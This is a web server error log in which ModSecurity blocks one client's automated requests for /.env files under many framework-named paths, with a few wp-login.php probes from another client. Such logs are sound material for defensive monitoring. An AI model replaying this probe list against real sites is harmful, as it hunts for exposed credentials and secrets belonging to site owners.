[Mon May 11 18:06:56.033800 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-oIW8yzYoWG_eyCW6rAAAAUg"]
[Mon May 11 18:06:56.304383 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cms/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/cms/.env"] [unique_id "agH-oIW8yzYoWG_eyCW6rQAAAUg"]
[Mon May 11 18:06:56.304624 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/cms/.env"] [unique_id "agH-oIW8yzYoWG_eyCW6rQAAAUg"]
[Mon May 11 18:06:56.304923 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-oIW8yzYoWG_eyCW6rQAAAUg"]
[Mon May 11 18:06:56.584812 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /drupal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/drupal/.env"] [unique_id "agH-oIW8yzYoWG_eyCW6rgAAAUg"]
[Mon May 11 18:06:56.585034 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/drupal/.env"] [unique_id "agH-oIW8yzYoWG_eyCW6rgAAAUg"]
[Mon May 11 18:06:56.585329 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-oIW8yzYoWG_eyCW6rgAAAUg"]
[Mon May 11 18:06:56.847825 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /joomla/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/joomla/.env"] [unique_id "agH-oIW8yzYoWG_eyCW6rwAAAUg"]
[Mon May 11 18:06:56.848053 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/joomla/.env"] [unique_id "agH-oIW8yzYoWG_eyCW6rwAAAUg"]
[Mon May 11 18:06:56.848363 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-oIW8yzYoWG_eyCW6rwAAAUg"]
[Mon May 11 18:06:57.188240 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /magento/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/magento/.env"] [unique_id "agH-oYW8yzYoWG_eyCW6sAAAAUg"]
[Mon May 11 18:06:57.188454 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/magento/.env"] [unique_id "agH-oYW8yzYoWG_eyCW6sAAAAUg"]
[Mon May 11 18:06:57.188778 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-oYW8yzYoWG_eyCW6sAAAAUg"]
[Mon May 11 18:06:57.464242 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /shopify/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/shopify/.env"] [unique_id "agH-oYW8yzYoWG_eyCW6sgAAAUg"]
[Mon May 11 18:06:57.464466 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/shopify/.env"] [unique_id "agH-oYW8yzYoWG_eyCW6sgAAAUg"]
[Mon May 11 18:06:57.464769 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-oYW8yzYoWG_eyCW6sgAAAUg"]
[Mon May 11 18:06:57.725549 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prestashop/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/prestashop/.env"] [unique_id "agH-oYW8yzYoWG_eyCW6swAAAUg"]
[Mon May 11 18:06:57.725773 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/prestashop/.env"] [unique_id "agH-oYW8yzYoWG_eyCW6swAAAUg"]
[Mon May 11 18:06:57.726065 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-oYW8yzYoWG_eyCW6swAAAUg"]
[Mon May 11 18:06:58.002203 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /codeigniter/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/codeigniter/.env"] [unique_id "agH-ooW8yzYoWG_eyCW6tAAAAUg"]
[Mon May 11 18:06:58.002433 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/codeigniter/.env"] [unique_id "agH-ooW8yzYoWG_eyCW6tAAAAUg"]
[Mon May 11 18:06:58.002732 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-ooW8yzYoWG_eyCW6tAAAAUg"]
[Mon May 11 18:06:58.478491 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cakephp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/cakephp/.env"] [unique_id "agH-ooW8yzYoWG_eyCW6tgAAAUg"]
[Mon May 11 18:06:58.478727 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/cakephp/.env"] [unique_id "agH-ooW8yzYoWG_eyCW6tgAAAUg"]
[Mon May 11 18:06:58.479048 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-ooW8yzYoWG_eyCW6tgAAAUg"]
[Mon May 11 18:07:02.080326 2026] [:error] [pid 1411099:tid 1411118] [client 102.165.54.9:49911] File does not exist: /home/piregwan/public_html/wp-login.php, referer: https://www.piregwan-genesis.com
[Mon May 11 18:07:03.789276 2026] [:error] [pid 1412074:tid 1412097] [client 102.165.54.9:48848] File does not exist: /home/piregwan/public_html/wp-login.php, referer: https://www.piregwan-genesis.com/wp-login.php?action=register
[Mon May 11 18:07:05.582535 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /zend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/zend/.env"] [unique_id "agH-qQ-Qm4vhlWBPlMjd4wAAAAo"]
[Mon May 11 18:07:05.582745 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/zend/.env"] [unique_id "agH-qQ-Qm4vhlWBPlMjd4wAAAAo"]
[Mon May 11 18:07:05.584279 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-qQ-Qm4vhlWBPlMjd4wAAAAo"]
[Mon May 11 18:07:05.769629 2026] [security2:error] [pid 1416109:tid 1416129] [client 129.226.83.4:48604] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.pweil.com"] [uri "/"] [unique_id "agH-qVV4kyjgo4bQBUh49QAAAMA"]
[Mon May 11 18:07:05.836672 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /yii/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/yii/.env"] [unique_id "agH-qQ-Qm4vhlWBPlMjd5AAAAAo"]
[Mon May 11 18:07:05.836909 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/yii/.env"] [unique_id "agH-qQ-Qm4vhlWBPlMjd5AAAAAo"]
[Mon May 11 18:07:05.837221 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-qQ-Qm4vhlWBPlMjd5AAAAAo"]
[Mon May 11 18:07:06.131566 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel5/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/laravel5/.env"] [unique_id "agH-qg-Qm4vhlWBPlMjd5gAAAAo"]
[Mon May 11 18:07:06.131810 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/laravel5/.env"] [unique_id "agH-qg-Qm4vhlWBPlMjd5gAAAAo"]
[Mon May 11 18:07:06.132183 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-qg-Qm4vhlWBPlMjd5gAAAAo"]
[Mon May 11 18:07:06.389698 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/v1/.env"] [unique_id "agH-qg-Qm4vhlWBPlMjd5wAAAAo"]
[Mon May 11 18:07:06.389925 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/v1/.env"] [unique_id "agH-qg-Qm4vhlWBPlMjd5wAAAAo"]
[Mon May 11 18:07:06.390229 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-qg-Qm4vhlWBPlMjd5wAAAAo"]
[Mon May 11 18:07:06.670476 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v2/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/v2/.env"] [unique_id "agH-qg-Qm4vhlWBPlMjd6AAAAAo"]
